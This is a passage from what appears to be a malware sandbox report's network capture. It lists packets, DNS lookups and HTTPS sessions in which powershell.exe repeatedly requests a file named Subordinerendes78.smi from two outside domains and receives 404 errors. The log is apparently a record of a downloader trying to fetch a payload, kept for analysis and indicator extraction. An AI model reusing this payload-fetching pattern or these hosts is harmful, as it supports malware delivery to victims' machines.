                                                    Dec 5, 2024 10:44:18.918028116 CET49751443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:18.918530941 CET49751443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:22.941253901 CET49762443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:22.941309929 CET44349762148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:22.941395044 CET49762443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:22.941946983 CET49762443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:22.941986084 CET44349762148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:24.342149019 CET44349762148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:24.343607903 CET49762443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:24.343653917 CET44349762148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:24.885961056 CET44349762148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:24.886121035 CET44349762148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:24.886228085 CET49762443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:24.887442112 CET49762443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:28.894249916 CET49778443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:28.894289970 CET44349778184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:28.894366026 CET49778443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:28.894639969 CET49778443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:28.894651890 CET44349778184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:30.155216932 CET44349778184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:30.196147919 CET49778443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:30.196178913 CET44349778184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:30.615765095 CET44349778184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:30.615834951 CET44349778184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:30.616075039 CET49778443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:30.616400957 CET49778443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:34.612926006 CET49794443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:34.612973928 CET44349794148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:34.613080978 CET49794443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:34.613424063 CET49794443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:34.613440037 CET44349794148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:36.018673897 CET44349794148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:36.019674063 CET49794443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:36.019686937 CET44349794148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:36.565535069 CET44349794148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:36.565715075 CET44349794148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:36.565782070 CET49794443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:36.566190958 CET49794443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:40.597893000 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:40.597959042 CET44349806184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:40.598061085 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:40.598295927 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:40.598308086 CET44349806184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:41.860438108 CET44349806184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:41.906753063 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:41.912267923 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:41.912283897 CET44349806184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:42.320791960 CET44349806184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:42.320871115 CET44349806184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:42.320930004 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:42.321686983 CET49806443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:46.333775997 CET49822443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:46.333848000 CET44349822148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:46.333965063 CET49822443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:46.334289074 CET49822443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:46.334301949 CET44349822148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:47.732295036 CET44349822148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:47.733725071 CET49822443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:47.733767986 CET44349822148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:48.278263092 CET44349822148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:48.278415918 CET44349822148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:48.278482914 CET49822443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:48.278938055 CET49822443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:52.285240889 CET49838443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:52.285312891 CET44349838184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:52.285439014 CET49838443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:52.285698891 CET49838443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:52.285713911 CET44349838184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:53.545408010 CET44349838184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:53.546705008 CET49838443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:53.546756983 CET44349838184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:54.005935907 CET44349838184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:54.006007910 CET44349838184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:44:54.006102085 CET49838443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:54.006652117 CET49838443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:44:58.019620895 CET49849443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:58.019690990 CET44349849148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:58.019772053 CET49849443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:58.020087004 CET49849443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:58.020098925 CET44349849148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:59.613379955 CET44349849148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:44:59.619199991 CET49849443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:44:59.619251013 CET44349849148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:00.161998034 CET44349849148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:00.162158012 CET44349849148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:00.162297964 CET49849443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:00.164016962 CET49849443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:04.192370892 CET49865443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:04.192415953 CET44349865184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:04.192526102 CET49865443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:04.192778111 CET49865443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:04.192791939 CET44349865184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:05.455425024 CET44349865184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:05.456777096 CET49865443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:05.456795931 CET44349865184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:05.917782068 CET44349865184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:05.917916059 CET44349865184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:05.918417931 CET49865443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:05.918519020 CET49865443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:09.928395033 CET49881443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:09.928482056 CET44349881148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:09.928565979 CET49881443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:09.928993940 CET49881443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:09.929009914 CET44349881148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:11.329066992 CET44349881148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:11.331399918 CET49881443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:11.331433058 CET44349881148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:11.875750065 CET44349881148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:11.875895023 CET44349881148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:11.876019955 CET49881443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:11.876576900 CET49881443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:15.878963947 CET49895443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:15.879013062 CET44349895184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:15.879106045 CET49895443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:15.879364014 CET49895443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:15.879374981 CET44349895184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:17.138607025 CET44349895184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:17.141407013 CET49895443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:17.141443014 CET44349895184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:17.598706961 CET44349895184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:17.598793030 CET44349895184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:17.604080915 CET49895443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:17.621000051 CET49895443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:21.630317926 CET49908443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:21.630378008 CET44349908148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:21.630446911 CET49908443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:21.630750895 CET49908443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:21.630768061 CET44349908148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:23.033812046 CET44349908148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:23.035536051 CET49908443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:23.035574913 CET44349908148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:23.582307100 CET44349908148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:23.582463026 CET44349908148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:23.582541943 CET49908443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:23.583054066 CET49908443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:27.584290028 CET49924443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:27.584399939 CET44349924184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:27.584510088 CET49924443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:27.584815025 CET49924443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:27.584850073 CET44349924184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:28.845331907 CET44349924184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:28.846671104 CET49924443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:28.846738100 CET44349924184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:29.305562019 CET44349924184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:29.305634975 CET44349924184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:29.305685997 CET49924443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:29.306216002 CET49924443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:33.317372084 CET49939443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:33.317425966 CET44349939148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:33.317497015 CET49939443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:33.317786932 CET49939443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:33.317802906 CET44349939148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:34.716798067 CET44349939148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:34.718024969 CET49939443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:34.718074083 CET44349939148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:35.290885925 CET44349939148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:35.291091919 CET44349939148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:35.291148901 CET49939443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:35.291810036 CET49939443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:39.316755056 CET49951443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:39.316811085 CET44349951184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:39.316931963 CET49951443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:39.317147017 CET49951443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:39.317162037 CET44349951184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:40.579246998 CET44349951184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:40.580595016 CET49951443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:40.580651045 CET44349951184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:41.039381027 CET44349951184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:41.039453983 CET44349951184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:41.039527893 CET49951443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:41.040110111 CET49951443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:45.050698996 CET49967443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:45.050756931 CET44349967148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:45.050837040 CET49967443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:45.051146030 CET49967443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:45.051162958 CET44349967148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:46.445868969 CET44349967148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:46.447657108 CET49967443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:46.447685957 CET44349967148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:47.007359982 CET44349967148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:47.007524014 CET44349967148.251.114.233192.168.2.5
                                                    Dec 5, 2024 10:45:47.007661104 CET49967443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:47.008105040 CET49967443192.168.2.5148.251.114.233
                                                    Dec 5, 2024 10:45:51.019943953 CET49982443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:51.019968987 CET44349982184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:51.020405054 CET49982443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:51.020438910 CET49982443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:51.020443916 CET44349982184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:52.280555010 CET44349982184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:52.281788111 CET49982443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:52.281846046 CET44349982184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:52.792872906 CET44349982184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:52.792949915 CET44349982184.171.244.231192.168.2.5
                                                    Dec 5, 2024 10:45:52.793003082 CET49982443192.168.2.5184.171.244.231
                                                    Dec 5, 2024 10:45:52.793678045 CET49982443192.168.2.5184.171.244.231

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 5, 2024 10:43:47.223361969 CET6531253192.168.2.51.1.1.1
                                                    Dec 5, 2024 10:43:47.361464024 CET53653121.1.1.1192.168.2.5
                                                    Dec 5, 2024 10:43:59.254801989 CET5729053192.168.2.51.1.1.1
                                                    Dec 5, 2024 10:43:59.393702030 CET53572901.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 5, 2024 10:43:47.223361969 CET192.168.2.51.1.1.10xa939Standard query (0)www.almrwad.comA (IP address)IN (0x0001)false
                                                    Dec 5, 2024 10:43:59.254801989 CET192.168.2.51.1.1.10xc176Standard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 5, 2024 10:43:47.361464024 CET1.1.1.1192.168.2.50xa939No error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                    Dec 5, 2024 10:43:47.361464024 CET1.1.1.1192.168.2.50xa939No error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false
                                                    Dec 5, 2024 10:43:59.393702030 CET1.1.1.1192.168.2.50xc176No error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                    Dec 5, 2024 10:43:59.393702030 CET1.1.1.1192.168.2.50xc176No error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.almrwad.com
                                                    • www.erp-royal-crown.info

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549704184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:43:48 UTC183OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:43:49 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:43:49 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:43:49 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549705184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:43:54 UTC65OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    2024-12-05 09:43:55 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:43:55 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:43:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549706148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:00 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:01 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:44:01 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:44:01 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:44:01 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.549718184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:06 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:07 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:44:07 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:44:07 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.549735148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:12 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:13 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:44:12 GMT
                                                    server: LiteSpeed
